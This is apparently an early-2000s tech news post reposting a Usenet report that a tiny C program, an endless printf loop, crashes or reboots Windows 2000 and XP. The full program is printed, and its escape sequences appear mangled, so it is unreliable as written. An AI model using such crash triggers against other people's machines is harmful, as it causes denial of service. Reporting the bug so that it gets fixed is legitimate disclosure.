When you purchase through links on our site, we may earn an affiliate commission. Here’s how it works.

Crash Windows XP with tiny C program

Oh joy of joys... Found this from a side note to a story over on The Inquirer. Lets hope Microsoft fix this one with their "critical updates" from WindowsUpdate! (This is in the public domain so please don't blame me for posting this.)

    I'm posting this article on behalf of my coworker.

    He found the bug which crash or reboot Windows 2000 and Windows XP.

    If the following code is excuted on Win2k or XP, Win2k or XP crashes or rebooted. On Windows 98, nothing happens.

      #include <stdio.h>

      int main( void )

      {

      for( ;; ){

      printf( "hung upttbbbbbb" );

      }

      return 0;

      }

    -----------------------------

    Masaru Tsuchiyama

    -----------------------------

News source: groups.google.com - news:comp.os.ms-windows.programmer.win32

News source: The Inquirer - At the bottom of page is the reference!

Report a problem with article
Next Article

Win2k outperforms WinXP heavily!

Previous Article

X-Box Game Shipping Tomorrow!

Join the conversation!

Login or Sign Up to read and post a comment.

-1 Comments - Add comment